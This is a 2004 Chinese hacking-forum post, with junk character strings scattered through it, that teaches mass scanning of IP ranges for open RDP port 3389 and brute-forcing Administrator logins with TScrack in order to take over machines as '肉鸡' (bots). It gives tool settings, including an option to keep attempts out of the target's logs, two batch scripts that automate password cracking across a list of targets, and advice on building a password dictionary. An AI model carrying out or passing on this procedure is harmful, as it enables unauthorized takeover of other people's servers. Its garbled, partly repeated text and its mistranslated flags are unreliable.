|
作者:霜风 QQ:14226581
2 b3 O6 }& S6 y2 T, d1 M1 Y* Z- r终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。6 S5 s4 ^$ ?( a6 b2 t
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
5 b: C) ~2 R/ T+ E% {3 W首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:
, i% @6 D9 f* e$ \! F: J+ I7 F先打开superscan3如图1
) A* k8 c4 S: v% d/ S4 o/ ?, _
! D Q; {+ F$ h ~: U此主题相关图片如下:
2 H5 p; W9 I- Y5 z; s" m: H/ h : N) k( }' E% `+ }6 _9 F/ W$ D. j
|, _1 V$ {% T$ W# U- b
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
% L& l! D* F/ ]7 ^
7 @. V6 D* h; ]9 y2 W此主题相关图片如下:
1 \3 C; B# A, P. s
$ E+ u' |4 q# p3 Y, [+ Y# A 1 y. A7 {+ U# E5 x& N7 \. E4 t) P
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.
) I* v; h3 X# m- V* U这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
- c2 h' K: E; H( M$ M' h
% t! O9 ^4 g' d" X# n/ L/ H此主题相关图片如下:
+ o' o( d+ {; X7 l+ }
# ]/ b7 g& s2 s4 g9 x+ I7 n: H( G9 `" d) m0 M% \- C- Q
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。
" m8 H+ V- ^- b3 r3 e
3 Y0 V. C5 R7 n6 ~此主题相关图片如下:
6 Z) K6 E4 U; N' F( q
; ?0 n% b5 |. P接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
8 _2 X: b" D. `4 U
" Y% E7 S& c f! o" q% Z/ V3 l& r此主题相关图片如下:
2 I* ^) t1 z) s6 N* H" t
( ?0 b9 C2 c2 i# ?$ o# M# m进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。2 B4 F, L7 z; d1 I. C* x$ c* a
所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
+ O7 a Q# W9 s# W1 g- ITScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
" C- O1 c( w) y1 t2 t此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。2 H5 h7 Z6 C& D( O
在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
7 Q# S4 u# m3 I! l6 D-h : Print usage help and exit
6 C+ D8 a* Y" S, l-V : Print version info and exit6 v4 j1 }) m0 |/ Q8 b
-s : Print chipher strenght info and exit
; n, M4 v0 W- G- V( i* o, _-b : Enable failed password beep
, B) R3 y+ e0 R; j1 E: K-t : Use two simultaneous connections [EXPERIMENTAL]# P: E" @! l% {1 W# ]$ _3 M5 A7 h
-N : Prevent System Log entries on targeted server3 i. `; z# l4 N v( W
-U : Uninstall tscrack and remove components
" M+ d6 s" D) [( B% N-f <number> : Wordlist entry to start cracking with5 x4 C+ d N- S
-F <delay> : Sampling Frequency (Delay between samples in ms)$ |6 O; c3 \6 d1 l0 {& U
-l <user> : Account name to use, defaults to Administrator0 U4 W' A) \& @
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted; ]( R# Q1 S( j% L. |
-p <password> : Use <password> to logon instead of wordlist/blank pass% T6 f2 q/ o4 u: F7 q) u
-D <domain> : Specify domain to attempt logon to $ {+ I Y U2 P4 M4 d
1 A2 A; N2 f6 ?, N G
7 S6 S# \; O7 E- P8 ?. C/ f
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:: ]1 @8 N6 H! \3 d! s3 ?" |
-h : 显示使用帮助然后退出8 ^4 j8 K! T: A6 T& V
-V : 显示版本信息然后退出
. |4 Q/ o7 g4 [9 M-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)9 L& f% U, w, d% J
-b : 密码错误时发出声音) A) ^ j; |1 Z' z/ V3 n
-t : 同时发出多个连接,就是多线程。
2 z9 R! O2 M/ S% c8 Z* F3 S( h. C-N : Prevent System Log entries on targeted server
- {* t* B7 \0 D-U : 卸载移除tscrack组件。& D- k) x' e, _6 L7 [
-f <number> : 使用-F后面的密码。
|; P& u. w2 e# Z! t/ `! R+ e4 P-F <delay> : 间隔时间(频率)" `7 g9 D$ X7 \0 Z' y6 h
-l <user> : 使用-L后面的用户名
+ u# U, H. B, {- O- Q3 h1 |-w <wordlist> : 使用-W后面的字典
1 `1 k$ i6 h5 W8 w8 C @) ?3 L-p <password> : 使用-W后的密码
+ n0 M; l: S- f-D <domain> : 登陆主页面?+ o! ]6 }4 q6 q" U9 x3 [9 N7 x
相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:
1 o- r2 E5 h/ F0 i; {; F, w* f@if not exist IpcScan.txt goto noscan
6 K+ @! ]- V7 G& [8 n@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
" w$ I8 D* a7 k:noscan
# {# u' G+ C+ C& ^@echo 3389.txt no find or scan faild  4 U% X+ g3 _! N( Q2 a) Z
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)* e w. ^/ R. A \
保存后把后错名改为BAT就可以了。$ k1 d1 u8 x$ G7 g/ S: y
还写一个BAT,名字为HACK.BAT,代码如下:7 Z2 N, _: p* f( @& A0 n; I
@if not exist tscrack.exe goto noscan
' k& U$ h1 J* y& D. Y; X2 i@tscrack %1 -l administartor -w pass.dic >>rouji.txt$ ?' q" c1 ?- \3 w- y: A
:noscan
8 e/ ?- P" j# C@echo tscrack.exe no find or scan faild
8 W* S6 S6 I% C这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC6 m" W# Q7 m3 t B. i4 E- E
制作方法如上。1 n) a$ H0 J9 ~$ z; X& G
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
' S+ K0 r$ h+ X
. ~* I( P, [6 x! d( M此主题相关图片如下:
5 B ~, Z9 w9 V: m5 c怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.; H4 f3 }. q7 ?
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
9 G8 j: \2 ^, Q" D
9 D& E7 A# D" ~1 x* S4 k% E& A此主题相关图片如下:2 W6 r3 l w4 \/ N
+ N! s; u- p7 H怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
6 }) M) T, f5 k- x) X9 v5 d, g% l: e最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
